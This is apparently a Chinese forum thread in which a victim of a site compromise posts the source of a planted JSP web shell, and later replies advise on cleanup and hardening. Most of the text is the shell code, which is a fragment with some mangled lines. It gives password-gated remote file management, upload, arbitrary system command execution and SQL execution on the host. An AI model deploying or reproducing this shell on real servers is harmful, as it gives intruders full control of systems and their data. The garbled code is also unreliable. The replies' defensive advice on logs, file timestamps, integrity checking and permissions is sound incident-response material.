这是一个创建于 3552 天前的主题,其中的信息可能已经有所发展或是发生改变。
<body>
} else {
String password = null;
if (session.getAttribute("password") == null) {
password = (String)request.getParameter("password");
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误!</font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
String action = null;
if (request.getParameter("action") == null)
action = "main";
else
action = (String)request.getParameter("action");
if (action.equals("exit")) { session.removeAttribute("password"); response.sendRedirect(request.getRequestURI()); out.close(); return; } %>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="0">
<form name="form1" method="get">
<tr bgcolor="#CCCCCC">
<td id="title"><!--[程序首页]--></td>
<td align="right">
<select name="action" OnChange="Javascript:changeAction(document.form1)">
<option value="main">程序首页</option>
<option value="filesystem">文件系统</option>
<option value="command">系统命令</option>
<option value="database">数据库</option>
<option value="config">程序配置</option>
<option value="about">关于程序</option>
<option value="exit">退出程序</option>
</select>
<script language="Javascript">
<%
out.println("var action = \"" + action + "\"");
%>
var sAction = document.form1.action;
for (var i = 0; i < sAction.length; i ++) {
if (sAction[i].value == action) {
sAction[i].selected = true;
//title.innerHTML = "[" + sAction[i].innerHTML + "]";
}
}
</script>
</td>
</tr>
</form>
</table>
<%
//=====================================================================================
// end of main menu
if (action.equals("main")) { // print the system info table
//=======================================================================================
%>
<table align="center" width="600" cellpadding="2" cellspacing="1" border="0" bgcolor="#CCCCCC">
<tr bgcolor="#FFFFFF">
<td colspan="2" align="center">服务器信息</td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器名</td>
<td align="center" class="datarows"><%=request.getServerName()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器端口</td>
<td align="center" class="datarows"><%=request.getServerPort()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">操作系统</td>
<td align="center" class="datarows"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户名</td>
<td align="center" class="datarows"><%=System.getProperty("user.name")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户目录</td>
<td align="center" class="datarows"><%=System.getProperty("user.home")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户工作目录</td>
<td align="center" class="datarows"><%=System.getProperty("user.dir")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">程序相对路径</td>
<td align="center" class="datarows"><%=request.getRequestURI()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">程序绝对路径</td>
<td align="center" class="datarows"><%=request.getRealPath(request.getServletPath())%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">网络协议</td>
<td align="center" class="datarows"><%=request.getProtocol()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器软件版本信息</td>
<td align="center" class="datarows"><%=application.getServerInfo()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JDK 版本</td>
<td align="center" class="datarows"><%=System.getProperty("java.version")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JDK 安装路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.home")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 虚拟机版本</td>
<td align="center" class="datarows"><%=System.getProperty("java.vm.specification.version")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align=&quo;center" class="datarows">JAVA 虚拟机名</td>
<td align="center" class="datarows"><%=System.getProperty("java.vm.name")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 类路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.class.path")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 载入库搜索路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.library.path")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 临时目录</td>
<td align="center" class="datarows"><%=System.getProperty("java.io.tmpdir")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JIT 编译器名</td>
<td align="center" class="datarows"><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">扩展目录路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.ext.dirs")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td colspan="2" align="center">客户端信息</td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">客户机地址</td>
<td align="center" class="datarows"><%=request.getRemoteAddr()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务机器名</td>
<td align="center" class="datarows"><%=request.getRemoteHost()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">用户名</td>
<td align="center" class="datarows"><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">请求方式</td>
<td align="center" class="datarows"><%=request.getScheme()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">应用安全套接字层</td>
<td align="center" class="datarows"><%=request.isSecure() == true ? "是" : "否"%></td>
</tr>
</table>
<%
//=======================================================================================
// end of printing the system info table
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("filesystem")) {
String curPath = "";
String result = "";
String fsAction = "";
if (request.getParameter("curPath") == null) { curPath = request.getRealPath(request.getServletPath()); curPath = pathConvert((new File(curPath)).getParent()); } else { curPath = Unicode2GB((String)request.getParameter("curPath")); } if (request.getParameter("fsAction") == null) { fsAction = "list"; } else { fsAction = (String)request.getParameter("fsAction"); } if (fsAction.equals("list")) result = listFiles(curPath, request.getRequestURI() + "?action=" + action); else if (fsAction.equals("browse")) { result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); result += browseFile(curPath); } else if (fsAction.equals("open")) result = openFile(curPath, request.getRequestURI() + "?action=" + action); else if (fsAction.equals("save")) { if (request.getParameter("fileContent") == null) { result = "<font color=\"red\">页面导航错误</font>"; } else { String fileCOntent= Unicode2GB((String)request.getParameter("fileContent")); result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); } } else if (fsAction.equals("createFolder")) { if (request.getParameter("folderName") == null) { result = "<font color=\"red\">目录名不能为空</font>"; } else { String folderName = Unicode2GB(request.getParameter("folderName").trim()); if (folderName.equals("")) { result = "<font color=\"red\">目录名不能为空</font>"; } else { result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); } } } else if (fsAction.equals("createFile")) { if (request.getParameter("fileName") == null) { result = "<font color=\"red\">文件名不能为空</font>"; } else { String fileName = Unicode2GB(request.getParameter("fileName").trim()); if (fileName.equals("")) { result = "<font color=\"red\">文件名不能为空</font>"; } else { result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); } } } else if (fsAction.equals("deleteFile")) { if (request.getParameter("filesDelete") == null) { result = "<font color=\"red\">没有选择要删除的文件</font>"; } else { String[] files2Delete = (String[])request.getParameterValues("filesDelete"); if (files2Delete.length == 0) { result = "<font color=\"red\">没有选择要删除的文件</font>"; } else { for (int n = 0; n < files2Delete.length; n ++) { files2Delete[n] = Unicode2GB(files2Delete[n]); } result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); } } } else if (fsAction.equals("saveAs")) { if (request.getParameter("fileContent") == null) { result = "<font color=\"red\">页面导航错误</font>"; } else { String fileCOntent= Unicode2GB(request.getParameter("fileContent")); result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); } } else if (fsAction.equals("upload")) { result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); } else if (fsAction.equals("copyto")) { if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { result = "<font color=\"red\">没有选择要复制的文件</font>"; } else { String[] files2Copy = request.getParameterValues("filesDelete"); String dstPath = request.getParameter("dstPath").trim(); if (files2Copy.length == 0) { result = "<font color=\"red\">没有选择要复制的文件</font>"; } else if (dstPath.equals("")) { result = "<font color=\"red\">没有填写要复制到的目录路径</font>"; } else { for (int i = 0; i < files2Copy.length; i ++) files2Copy[i] = Unicode2GB(files2Copy[i]); result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); } } } else if (fsAction.equals("rename")) { if (request.getParameter("fileRename") == null) { result = "<font color=\"red\">页面导航错误</font>"; } else { String file2Rename = request.getParameter("fileRename").trim(); String newName = request.getParameter("newName").trim(); if (file2Rename.equals("")) { result = "<font color=\"red\">没有选择要重命名的文件</font>"; } else if (newName.equals("")) { result = "<font color=\"red\">没有填写新文件名</font>"; } else { result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); } } } %>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<form method="post" name="form2" action="<%= request.getRequestURI() + "?action=" + action%>">
<tr bgcolor="#FFFFFF">
<td align="center">地址 <input type="text" size="80" name="curPath" class="textbox" value="<%=curPath%>" />
<input type="submit" value="转到" class="button" /></td>
</tr>
</form>
<tr bgcolor="#FFFFFF">
<td><%= result.trim().equals("")?" " : result%></td>
</tr>
</table>
<%
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("command")) {
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) { cmd = (String)request.getParameter("command"); result = exeCmd(cmd); } // print the command form
//========================================================================================
%>
<table border="0" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" align="center">
<form name="form2" method="post" action="<%=request.getRequestURI() + "?action=" + action%>">
<tr bgcolor="#FFFFFF">
<td align="center">执行命令</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">
<input type="text" class="textbox" size="80" name="command" value="<%=cmd%>" />
<input type="submit" class="button" value="执行" />
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">执行结果</td>
</tr>
</form>
</table>
<table align="center" width="600" border="0">
<tr>
<td><%=result == "" ? " " : result%></td>
</tr>
</table>
<%
//=========================================================================================
// end of printing command form
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("database")) {
String dbAction = "";
String result = "";
String dbType = "";
String dbServer = "";
String dbPort = "";
String dbUsername = "";
String dbPassword = "";
String dbName = "";
String dbResult = "";
String sql = "";
if (request.getParameter("dbAction") == null) { dbAction = "main"; } else { dbAction = request.getParameter("dbAction").trim(); if (dbAction.equals("")) dbAction = "main"; } if (dbAction.equals("main")) { result = " "; } else if (dbAction.equals("dbConnect")) { if (request.getParameter("dbType") == null || request.getParameter("dbServer") == null || request.getParameter("dbPort") == null || request.getParameter("dbUsername") == null || request.getParameter("dbPassword") == null || request.getParameter("dbName") == null) { response.sendRedirect(request.getRequestURI() + "?action=" + action); } else { dbType = request.getParameter("dbType").trim(); dbServer = request.getParameter("dbServer").trim(); dbPort = request.getParameter("dbPort").trim(); dbUsername = request.getParameter("dbUsername").trim(); dbPassword = request.getParameter("dbPassword").trim(); dbName = request.getParameter("dbName").trim(); if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { if (DBConnect(dbUsername, dbPassword)) { if (request.getParameter("sql") != null) { sql = request.getParameter("sql").trim(); if (! sql.equals("")) { dbResult = DBExecute(sql); } } result = "<script language=\"Javascript\">\n"; result += "<!--\n"; result += "function exeSql() {\n"; result += " if (ltrim(document.dbInfo.sql.value) != \"\")\n"; result += " document.dbInfo.submit();"; result += "}\n"; result += "\n"; result += "function resetIt() {\n"; result += " document.dbInfo.sql.value = \"\";"; result += "}\n"; result += "//-->\n"; result += "</script>\n"; result += "sql 语句<br/><textarea name=\"sql\" cols=\"70\" rows=\"6\">" + sql + "</textarea><br/><input type=\"submit\" class=\"button\" Onclick=\"Javascript:exeSql()\" value=\"执行\"/> <input type=\"reset\" class=\"button\" Onclick=\"Javascript:resetIt()\" value=\"清空\"/>\n"; DBRelease(); } else { result = "<font color=\"red\">数据库连接失败</font>"; } } else { result = "<font color=\"red\">数据库连接驱动没有找到</font>"; } } } %>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<form name="config" method="post" action="<%=request.getRequestURI() + "?action=config&cfAction=save"%>" OnSubmit="Javascript:selectAllTypes()">
<tr bgcolor="#FFFFFF">
<td align="center" width="200">密码</td>
<td><input type="text" size="30" name="password" class="textbox" value="<%=_password%>" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">系统编码</td>
<td><input type="text" size="30" name="encode" value="<%=_encodeType%>" class="textbox" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">Session 超时时间</td>
<td><input type="text" size="5" name="sessionTime" class="textbox" value="<%=_sessionOutTime%>" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">可编辑文件类型</td>
<td>
<table border="0" width="190" cellpadding="0" cellspacing="0">
<tr>
<td>
<input type="text" size="11" class="textbox" name="newType" />
</td>
<td align="center">
<input type="button" OnClick="Javascript:delFileType()" value="<<" class="button" />
<p></p>
<input type="button" value=">>" OnClick="Javascript:addFileType()" class="button" />
</td>
<td align="right">
<select name="textFileTypes" size="4" style="width: 87px" multiple="true">
<%
for (i = 0; i < _textFileTypes.length; i ++) {
%>
<option value="<%=_textFileTypes[i]%>"><%=_textFileTypes[i]%></option>
<%
}
%>
</select>
</td>
</tr>
</table>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center" colspan="2"><input type="submit" value="保存" class="button" /></td>
</tr>
</form>
</table>
<%
} else if (cfAction.equals("save")) {
if (request.getParameter("password") == null ||
request.getParameter("encode") == null ||
request.getParameter("sessionTime") == null ||
request.getParameterValues("textFileTypes") == null) {
response.sendRedirect(request.getRequestURI());
}
String result = ""; String newPassword = request.getParameter("password").trim(); String newEncodeType = request.getParameter("encode").trim(); String newSessiOnTime= request.getParameter("sessionTime").trim(); String[] newTextFileTypes = request.getParameterValues("textFileTypes"); String jshellPath = request.getRealPath(request.getServletPath()); try { JshellConfig jcOnfig= new JshellConfig(jshellPath); jconfig.setPassword(newPassword); jconfig.setEncodeType(newEncodeType); jconfig.setSessionTime(newSessionTime); jconfig.setTextFileTypes(newTextFileTypes); jconfig.save(); result += "设置保存成功,正在返回,请稍候……"; result += "<meta http-equiv=\"refresh\" cOntent=\"2;url=" + request.getRequestURI() + "?action=" + request.getParameter("action") + "\">"; } catch (JshellConfigException e) { result = "<font color=\"red\">" + e.getMessage() + "</font>"; } %>
<table border="0" align="center" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<tr bgcolor="#FFFFFF">
<td align="center">关于 jshell ver 0.1</td>
</tr>
<tr bgcolor="#FFFFFF">
<td> Jshell 是一个简单的 jsp 的 Web Shell ,功能很简单。这个程序是我这几天上课空闲时间里没是干写着玩的,慢慢的也有了点雏形,就拿出来希望对你有点用处。程序本身很乱,可读性不好,不过还是欢迎有兴趣的朋友和我交流。</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">created by <a href="mailto:[email protected]">luoluo</a> and welcome to <a href="http://www.ph4nt0m.org" target="_blank">幻影旅团</a></td>
</tr>
</table>
</body>
</html>
 | 1 maskerTUI 2016-01-25 10:20:47 +08:00 via Android 不是想着怎么补救吗?看一下程序哪里有漏洞,赶紧补程序,装个安全狗什么的挡一下。 |
 | 2 master13 2016-01-25 11:10:03 +08:00 <body> } else { …… po 主这样的页面……后面干脆就不看了…… |
 | 3 odirus 2016-01-25 11:14:22 +08:00 版本控制的重要性。。。以前我们服务器也被挂马了,不过处理这种病毒很烦,所以通过负载均衡把流量导入其他服务器,直接重装系统,加固安全,重新部署。。。 如果你有自动部署环境和代码的话,会非常快。 |
 | 4 xsseroot 2016-01-25 11:17:30 +08:00 看系统日志与 web server 日志 |
| 5 xsseroot 2016-01-25 11:18:12 +08:00 还有文件修改时间 |
 | 7 h4rdy 2016-01-25 11:59:46 +08:00 要是被留下各种猥琐后门,还真不好找出来。重装吧 |
 | 8 dapang1221 2016-01-25 12:08:03 +08:00 你们不备份么。。?直接回滚不就好了。。顶多丢些缓存。。要么就是看修改时间,要么就是找出来插入的代码,批量替换掉 |
 | 9 chu1337 2016-01-25 13:42:11 +08:00 有备份就回滚吧,没有的话建议如下: 1. 日志 2. 文件修改时间 3. 网上搜索下相关脚本,对 web 目录进行查杀 4. 判断是否被提权,如被提权注意用户, crontab 任务 |
 | 10 reb00ts 2016-01-25 17:40:29 +08:00 楼主你这都已经被挂马了,我觉得还是先将问题主机下线,查日志,找到漏洞从哪里产生,黑客干了什么,把这些摸清楚以便于及时堵住漏洞和清理后门,然后给服务器做点基本的安全加固(尤其是 web 服务低权限运行),至于你说的查询文件变动,我推荐 tripwire ,很不错的工具 |
 | 11 f7ee9404 2016-01-25 18:18:59 +08:00 更新的时候有没有每个文件做个校验和? 没有的话 回退吧 |
 | 12 just1 2016-01-25 18:22:00 +08:00 via Android linux 还是重装吧 |
 | 13 mN71eOOprFyMsnPx 2016-01-25 20:52:11 +08:00  2 楼主一定要确保 web 服务器是低权限运行,只允许访问指定的文件扩展名。即使有网页木马也没任何关系,直接删除即可。 我自己维护的服务器很多都出现这种情况,客户的网页漏洞多得不得了,天天中木马,我都到了不想删除的地步。虚拟主机服务器上网页木马一堆堆,删都删除不完。 我自己的服务器也有网页中木马的情况,我分析开发人员完全解决不可能。所以服务器有系统防火墙, web 服务器有 web 防火墙, php 内部代码有简单的过滤代码。这个方案上线了 2 个月,解决了之前 1 年都没解决的被挂马的情况。 |
| 14 mN71eOOprFyMsnPx 2016-01-25 20:53:38 +08:00 现在楼主已经中木马,分析文件创建时间是最实际的方法。看系统日志之类的没任何作用。 |
 | 15 kiah 2016-01-25 21:04:28 +08:00 云锁 你值得拥有 |
 | 16 realpg PRO 为什么有写权限的目录里面同时有执行权限呢? |
 | 17 vus520 2016-01-26 15:38:50 +08:00 1 ,版本控制工具看修改历史 2 ,可写目录决对不能有执行权限,可写目录的所有请求都当成文件下载,不执行 如果是服务器沦陷了,那就要堵服务器的漏洞了。 |
Select Language